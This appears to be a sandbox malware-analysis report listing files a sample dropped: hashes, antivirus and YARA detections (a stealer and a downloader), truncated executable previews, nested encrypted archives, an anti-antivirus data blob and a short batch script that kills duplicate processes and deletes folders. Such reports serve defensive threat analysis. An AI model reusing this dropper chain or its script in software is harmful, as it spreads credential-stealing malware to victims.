SHA-256:	12226CCAE8C807641241BA5178D853AAD38984EEFB0C0C4D65ABC4DA3F9787C3
SHA-512:	9286D267B167CBA01E55E68C8C5582F903BED0DD8BC4135EB528EF6814E60E7D4DDA2B3611E13EFB56AA993635FBAB218B0885DAF5DAEA6043061D8384AF40CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 54%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....V...............P.../..Z......../.. ....0...@.. ........................2...........@.................................../.K.....0.@W...................`2.....3./.............................................. ............... ..H............text...../.. ..../................. ..`.rsrc...@W....0..X..../.............@..@.reloc.......`2......"2.............@..B................../.....H...........@.......C...@...z..........................................6+.(B.99(......:+.(.^A.(!............(..........................(.....0..........(...8y.......E....c...O.../...8^...s......... .....:....&8....s.........8....s......... .....9....& ....8....s......... ....8....s.........8.......0..............0..............0..............0..............0............................0..............0.....................0.................*...".......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.3803631483702095
Encrypted:	false
SSDEEP:	48:SfNaoQdTEQlfNaoQAQ2fNaoQNQwfNaoQFCvH0UrU0U8QFK:6NnQdTEQRNnQAQeNnQNQ8NnQFC/0UrUU
MD5:	69BA3CA27DCD9B0C55C3E21930946B03
SHA1:	E4D2A7B0ADF991DFA6E720986092D143BA481F97
SHA-256:	882D6C99D1663B7055EE1755CECD056694D559A09316A0AD1122472418FC5BA8
SHA-512:	04ED9A72D7B71442547B91BC707588F422E7331A15EDA72FE401D338CD5B98495F0C0AEB1991B1BB3C20BE004D2733E2E3D508D465CB7C1FCBA0DF0F5D358B3D
Malicious:	false
Reputation:	unknown
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/D0879E1087467EF4E78538A1B0FC84C7",.. "id": "D0879E1087467EF4E78538A1B0FC84C7",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/D0879E1087467EF4E78538A1B0FC84C7"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/4B22C88DC5A407D8D1181E23C5CCBDA0",.. "id": "4B22C88DC5A407D8D1181E23C5CCBDA0",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/4B22C88DC5A407D8D1181E23C5CCBDA0"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1716736
Entropy (8bit):	7.934320603558459
Encrypted:	false
SSDEEP:	49152:vXEKweOsMEWvrJaG1k7t1PGZGvgXMz7HSlX2YZWB:vXLweOsMEy0GOPGZGvgX2zSB2YY
MD5:	C6E7C724DD8F29F45E6686E0ADD2AD81
SHA1:	17BBECDB411A3B3FDF1D153E421AC26407DD7AF6
SHA-256:	C758D67328CDF99CEB5876690F0D82CB3D44E7473D89CF847E704D5AE794167D
SHA-512:	8AACA79F0E42FDF97614931DF03FD9E671D742421038896F4395019200F36AF0421F13A1CD2964B846557F792066013CDD8D66DDADAF7418A5B02AFA617D1742
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............D.. ...`....@.. ........................D......p....`.................................U...i....`..D........................................................................................................... . .@... ....... ..............@....rsrc...D....`.......2..............@....idata . ...........6..............@... ..)..........8..............@...giuvursf......*......:..............@...cwujweuv. ...`D.....................@....taggant.@....D.."..................@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1801728
Entropy (8bit):	7.946848271724782
Encrypted:	false
SSDEEP:	49152:TfBJWmeQ8azZDbcrMbyOm+hJyFJX94a0FC:T+me+zarJHXea0FC
MD5:	8E89923EFBAC42F80F4E7FC0DC7AAE45
SHA1:	81667219CFB7E2D36D72FAA07FF10315E451FBD5
SHA-256:	5049CB5F3B6DD8FE8DBC93D3D1ABE40C32F69136447F934C65E4F29D3432A922
SHA-512:	D6E57A2B3DAF422985B2FBCA5E0062013662B9E9AD8A66854E626EFE2315FB6A6812AB02A95967D61FD5BDBAA9351C97A85A54640E8E813CB6985D2D614CD5CF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................`G...........@...........................G.....&{....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......\..............@... ..)..@.......^..............@...hraxhmin.....P.......`..............@...dhruiwut.....PG......X..............@....taggant.0...`G.."...\..............@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2928640
Entropy (8bit):	6.475379184436146
Encrypted:	false
SSDEEP:	49152:1K4DY+M6dKHkftnghcsG3TKnYrt1lPXnMIssK:syY+M6dKHkFnghcsSTbrtLXH
MD5:	5081EA72759BA0DEA91A56403FF62DC6
SHA1:	40BDDAE611127BEEB297E9BF3E865AF47B8ED4E7
SHA-256:	7F7E285C14BA16177FAC9340654EBA93F5BCDDD100DC2C7259AFC2AD4CD19D88
SHA-512:	671425D2017542F7A4AABC339C9EC46180AEC25A4EF00915D3851BCAE43024E944ECCE5B226EE5BBFE108A6DA6301A027050DF4748E3A01F1BBE9DC15CF03B2F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.\|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(........O...........@...........................P.....Ra-...@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@...assqlaww..+...$...+..\|..............@...blchljdg......O.......,.............@....taggant.0....O.."....,.............@...........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	967680
Entropy (8bit):	6.697239741880639
Encrypted:	false
SSDEEP:	24576:zqDEvCTbMWu7rQYlBQcBiT6rprG8aFd0:zTvC/MTQYxsWR7aF
MD5:	629A3EAF01FB818CD0B1964E454BA39B
SHA1:	8547E7FCBDFEAB3247A48F30B39A1232E96877A6
SHA-256:	B2B6975A924C3A1F11BB59B938B1500785EE92C86DEB537659129C487D3B1FC2
SHA-512:	3F29342B1D5D60C258ADD05F929C8FC077F9AAD839F5E975CE7AAEB7E38A225806C716D3650E28EF5AFF053B89E596995ED1B12FF9881F0DDAF274AA3AC9954E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...s.cg..........".................w.............@.......................... ......m1....@...@.......@.....................d...\|....@...X.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....X...@...Z..................@..@.reloc...u.......v...N..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1716736
Entropy (8bit):	7.934320603558459
Encrypted:	false
SSDEEP:	49152:vXEKweOsMEWvrJaG1k7t1PGZGvgXMz7HSlX2YZWB:vXLweOsMEy0GOPGZGvgX2zSB2YY
MD5:	C6E7C724DD8F29F45E6686E0ADD2AD81
SHA1:	17BBECDB411A3B3FDF1D153E421AC26407DD7AF6
SHA-256:	C758D67328CDF99CEB5876690F0D82CB3D44E7473D89CF847E704D5AE794167D
SHA-512:	8AACA79F0E42FDF97614931DF03FD9E671D742421038896F4395019200F36AF0421F13A1CD2964B846557F792066013CDD8D66DDADAF7418A5B02AFA617D1742
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............D.. ...`....@.. ........................D......p....`.................................U...i....`..D........................................................................................................... . .@... ....... ..............@....rsrc...D....`.......2..............@....idata . ...........6..............@... ..)..........8..............@...giuvursf......*......:..............@...cwujweuv. ...`D.....................@....taggant.@....D.."..................@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4438776
Entropy (8bit):	7.99505709582503
Encrypted:	true
SSDEEP:	98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
MD5:	3A425626CBD40345F5B8DDDD6B2B9EFA
SHA1:	7B50E108E293E54C15DCE816552356F424EEA97A
SHA-256:	BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
SHA-512:	A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Reputation:	unknown
Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...\|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F

C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3286016
Entropy (8bit):	7.310046848182974
Encrypted:	false
SSDEEP:	49152:yla31k0wuMKWrJSYQTdfjfkn46z2jnVGd7jyy7qaJJR0BmXSyYO3:yla3/tS4K2jnVGRjHLJfV
MD5:	C00A67D527EF38DC6F49D0AD7F13B393
SHA1:	7B8F2DE130AB5E4E59C3C2F4A071BDA831AC219D
SHA-256:	12226CCAE8C807641241BA5178D853AAD38984EEFB0C0C4D65ABC4DA3F9787C3
SHA-512:	9286D267B167CBA01E55E68C8C5582F903BED0DD8BC4135EB528EF6814E60E7D4DDA2B3611E13EFB56AA993635FBAB218B0885DAF5DAEA6043061D8384AF40CA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 54%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....V...............P.../..Z......../.. ....0...@.. ........................2...........@.................................../.K.....0.@W...................`2.....3./.............................................. ............... ..H............text...../.. ..../................. ..`.rsrc...@W....0..X..../.............@..@.reloc.......`2......"2.............@..B................../.....H...........@.......C...@...z..........................................6+.(B.99(......:+.(.^A.(!............(..........................(.....0..........(...8y.......E....c...O.../...8^...s......... .....:....&8....s.........8....s......... .....9....& ....8....s......... ....8....s.........8.......0..............0..............0..............0..............0............................0..............0.....................0.................*...".......

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3032576
Entropy (8bit):	6.5652640274268075
Encrypted:	false
SSDEEP:	49152:/zsb0bm8mmlxTfGeiWPfaIUekCLjWP2vhhrEFxmKtQCh:/zznmkfGeZPfaIUAL6KhELm
MD5:	7944EBE231D464C760A818B34A636CCE
SHA1:	52BDB9427BD7E9D2E2A75BCF5FC76E0E7819A73B
SHA-256:	C478F40CFE686BDC076D898A735F2857316A64D8E2D9DC405DDE3E0CA8194B7F
SHA-512:	6435A4F51A6FCE88EAF551CA452408FEA62D437EB2297A0F6CC2AEC94F51813E0C9370744B212217AB4E76016ADF892C2D42FB0E6A9D6C8FB3F64C74AF9351D7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@.......................... 2.....=.....@.................................W...k.............................1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...zopdawvw.0+......*+.................@...hctdavsk......1...... ..............@....taggant.0....1.."...$..............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\main\7z.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1679360
Entropy (8bit):	6.278252955513617
Encrypted:	false
SSDEEP:	24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
MD5:	72491C7B87A7C2DD350B727444F13BB4
SHA1:	1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
SHA-256:	34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
SHA-512:	583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......\|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\main\7z.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	468992
Entropy (8bit):	6.157743912672224
Encrypted:	false
SSDEEP:	6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
MD5:	619F7135621B50FD1900FF24AADE1524
SHA1:	6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
SHA-256:	344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
SHA-512:	2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\main\KillDuplicate.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	222
Entropy (8bit):	4.855194602218789
Encrypted:	false
SSDEEP:	6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
MD5:	68CECDF24AA2FD011ECE466F00EF8450
SHA1:	2F859046187E0D5286D0566FAC590B1836F6E1B7
SHA-256:	64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
SHA-512:	471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
Malicious:	false
Reputation:	unknown
Preview:	Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f

C:\Users\user\AppData\Local\Temp\main\extracted\AntiAV.data

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	2355713
Entropy (8bit):	5.891648193754473
Encrypted:	false
SSDEEP:	24576:5yZBPkpRrP9pxC+XvoflcYy36s3vb0EecYy37n92k8GtGAQZ67hR7krC/Cyf0/xO:R9kqGu7okoZscCnf0/Zs9p
MD5:	579A63BEBCCBACAB8F14132F9FC31B89
SHA1:	FCA8A51077D352741A9C1FF8A493064EF5052F27
SHA-256:	0AC3504D5FA0460CAE3C0FD9C4B628E1A65547A60563E6D1F006D17D5A6354B0
SHA-512:	4A58CA0F392187A483B9EF652B6E8B2E60D01DAA5D331549DF9F359D2C0A181E975CF9DF79552E3474B9D77F8E37A1CF23725F32D4CDBE4885E257A7625F7B1F
Malicious:	false
Reputation:	unknown
Preview:	KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4

C:\Users\user\AppData\Local\Temp\main\extracted\file_4.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1800056
Entropy (8bit):	7.997723543142523
Encrypted:	true
SSDEEP:	49152:Zyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJQ:Yj13Trb6i5iGmuXZTbBizt0Jhm
MD5:	7187CC2643AFFAB4CA29D92251C96DEE
SHA1:	AB0A4DE90A14551834E12BB2C8C6B9EE517ACAF4
SHA-256:	C7E92A1AF295307FB92AD534E05FBA879A7CF6716F93AEFCA0EBFCB8CEE7A830
SHA-512:	27985D317A5C844871FFB2527D04AA50EF7442B2F00D69D5AB6BBB85CD7BE1D7057FFD3151D0896F05603677C2F7361ED021EAC921E012D74DA049EF6949E3A3
Malicious:	false
Reputation:	unknown
Preview:	PK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}.

C:\Users\user\AppData\Local\Temp\main\extracted\file_5.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1800210
Entropy (8bit):	7.997720745184939
Encrypted:	true
SSDEEP:	49152:ayj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJw:Pj13Trb6i5iGmuXZTbBizt0JhG
MD5:	B7D1E04629BEC112923446FDA5391731
SHA1:	814055286F963DDAA5BF3019821CB8A565B56CB8
SHA-256:	4DA77D4EE30AD0CD56CD620F4E9DC4016244ACE015C5B4B43F8F37DD8E3A8789
SHA-512:	79FC3606B0FE6A1E31A2ECACC96623CAF236BF2BE692DADAB6EA8FFA4AF4231D782094A63B76631068364AC9B6A872B02F1E080636EBA40ED019C2949A8E28DB
Malicious:	false
Reputation:	unknown
Preview:	PK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z..

C:\Users\user\AppData\Local\Temp\main\extracted\file_6.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1800364
Entropy (8bit):	7.997716835838842
Encrypted:	true
SSDEEP:	49152:kyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJv:lj13Trb6i5iGmuXZTbBizt0Jht
MD5:	0DC4014FACF82AA027904C1BE1D403C1
SHA1:	5E6D6C020BFC2E6F24F3D237946B0103FE9B1831
SHA-256:	A29DDD29958C64E0AF1A848409E97401307277BB6F11777B1CFB0404A6226DE7
SHA-512:	CBEEAD189918657CC81E844ED9673EE8F743AED29AD9948E90AFDFBECACC9C764FBDBFB92E8C8CEB5AE47CEE52E833E386A304DB0572C7130D1A54FD9C2CC028
Malicious:	false
Reputation:	unknown
Preview:	PK........n..Y..+..x...x......file_5.zipPK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..

C:\Users\user\AppData\Local\Temp\main\extracted\file_7.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	3473559
Entropy (8bit):	7.9992359395959935
Encrypted:	true
SSDEEP:	98304:8aR3D0Ae5mwdkDWm1Xo4j13Trb6i5iGmuXZTbBizt0Jhd:ds5m6sXoArb6iguZnBi5Qd
MD5:	CEA368FC334A9AEC1ECFF4B15612E5B0
SHA1:	493D23F72731BB570D904014FFDACBBA2334CE26
SHA-256:	07E38CAD68B0CDBEA62F55F9BC6EE80545C2E1A39983BAA222E8AF788F028541
SHA-512:	BED35A1CC56F32E0109EA5A02578489682A990B5CEFA58D7CF778815254AF9849E731031E824ADBA07C86C8425DF58A1967AC84CE004C62E316A2E51A75C8748
Malicious:	false
Reputation:	unknown
